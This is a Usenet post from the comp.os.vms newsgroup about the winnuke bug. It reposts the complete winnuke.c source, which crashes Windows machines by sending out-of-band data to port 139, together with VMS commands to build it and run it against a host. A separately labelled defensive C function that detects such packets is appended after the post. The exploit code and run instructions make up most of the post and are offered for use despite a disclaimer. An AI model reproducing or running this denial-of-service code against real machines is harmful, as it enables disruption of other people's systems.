Article 169874 of comp.os.vms:

Alan Greig wrote (duplicated code section when I cut and pasted
originally - here's what it should have been)
>
> Like a tea tray in the sky... wrote:
>
> > When reality hits, rather than go back to a tried and proven platform that has
>
> I think reality may have hit home quite hard since the release of the
> winnuke program on the net a few days ago. For those who haven't yet
> heard it's a few lines of C which will allow you to crash any Windows
> machine running an IP stack from anywhere on the Internet. It's really
> quite spectacular. I downloaded and compiled it under VMS and it crashes
> Windows NT machines every time. Microsoft has rushed out a patch
> of course but considering the simplicity of winnuke.c (basically it
> just sets the OUT-OF-BAND flag and transmits any old data to port 139) I
> can't help wondering how many other fatal bugs lurk in Microsoft's IP
> stack alone.
>
> As anyone can find it with a web search for winnuke.c I don't have any
> problems with posting a version which will run under VMS here. I DO NOT
> advise anyone to run this other than to check the vulnerability of
> machines under their own control. I want to stress that I have no
> connection with the authorship of this program. I just found it with an
> altavista search.
>
> $ cc/prefix=all winnuke
> $ link winnuke
> $ winnuke :== $disk:[dir]winnuke
> $ winnuke host.mydomain
>
> /* winnuke.c - (05/07/97)  By _eci  */
> /* Tested on Linux 2.0.30, OpenVMS 6.2, SunOS 5.5.1, and BSDI 2.1 */
>
> #include <stdio.h>
> #include <string.h>
> #include <netdb.h>
> #include <netinet/in.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <unistd.h>
>
> #define dport 139  /* Attack port: 139 is what we want */
>
> int x, s;
> char *str = "Bye";  /* Makes no diff */
> struct sockaddr_in addr, spoofedaddr;
> struct hostent *host;
>
> int open_sock(int sock, char *server, int port) {
>   struct sockaddr_in blah;
>   struct hostent *he;
>   memset((char *)&blah,'0',sizeof(blah));
>   blah.sin_family=AF_INET;
>   blah.sin_addr.s_addr=inet_addr(server);
>   blah.sin_port=htons(port);
>
>   if ((he = gethostbyname(server)) != NULL) {
>     memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length );
>   }
>   else {
>     if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
>       perror("gethostbyname()");
>       return(-3);
>     }
>   }
>
>   if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
>     perror("connect()");
>     close(sock);
>     return(-4);
>   }
>   printf("Connected to [%s:%d].\n",server,port);
>   return;
> }
>
> main(int argc, char *argv[]) {
>
>   if (argc != 2) {
>     printf("Usage: %s \n",argv[0]);
>     exit(0);
>   }
>
>   if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
>     perror("socket()");
>     exit(-1);
>   }
>
>   open_sock(s,argv[1],dport);
>
>   printf("Sending crash... ");
>   send(s,str,strlen(str),MSG_OOB);
>   sleep(2);
>   printf("Done!\n");
>   close(s);
> }
>
> --
> Alan Greig                            Tel: (01382) 308802
> University of Abertay Dundee          Email: A.Greig@tay.ac.uk
>   ** Never underestimate the power of human stupidity **

--
Alan Greig                            Tel: (01382) 308802
University of Abertay Dundee          Email: A.Greig@tay.ac.uk
  ** Never underestimate the power of human stupidity **
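
A defender-side check for the traffic the post describes (a TCP segment with the urgent flag set, sent to port 139), added here as an example; it is not part of the original post or of winnuke.c. The function names, the raw-IPv4 input format and the sample packet are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NETBIOS_SSN_PORT 139  /* destination port named in the post */
#define TCP_FLAG_URG 0x20     /* set on segments carrying MSG_OOB data */

/* Classify a raw IPv4 packet (buffer starts at the IP header).
 * Returns 1: TCP segment to port 139 with URG set; 0: anything else
 * that parses; -1: truncated or not IPv4. */
int is_oob_to_netbios(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;   /* IP header length */
    if (ihl < 20 || len < ihl)
        return -1;
    if (pkt[9] != 6)                            /* protocol: 6 = TCP */
        return 0;
    if ((((pkt[6] & 0x1f) << 8) | pkt[7]) != 0) /* later fragment: no TCP header */
        return 0;
    if (len < ihl + 20)
        return -1;                              /* TCP header cut short */
    const uint8_t *tcp = pkt + ihl;
    unsigned dport = ((unsigned)tcp[2] << 8) | tcp[3];
    return dport == NETBIOS_SSN_PORT && (tcp[13] & TCP_FLAG_URG) != 0;
}

/* Constructed sample: 40-byte IPv4+TCP headers, no payload, zero checksums. */
size_t make_sample(uint8_t *buf, unsigned dport, uint8_t tcp_flags)
{
    memset(buf, 0, 40);
    buf[0] = 0x45;              /* version 4, IHL 5 */
    buf[3] = 40;                /* total length */
    buf[9] = 6;                 /* TCP */
    buf[20 + 2] = (uint8_t)(dport >> 8);
    buf[20 + 3] = (uint8_t)dport;
    buf[20 + 12] = 0x50;        /* data offset: 5 words */
    buf[20 + 13] = tcp_flags;
    return 40;
}

int main(void)
{
    uint8_t p[40];
    size_t n = make_sample(p, 139, 0x38);       /* URG|PSH|ACK */
    printf("URG to port 139 -> %d\n", is_oob_to_netbios(p, n));
    return 0;
}
```

The check matches on the flag and port only, so it also fires on any other urgent-data segment sent to port 139; treat a hit as something to alert on or filter at the perimeter, not as proof of this particular program.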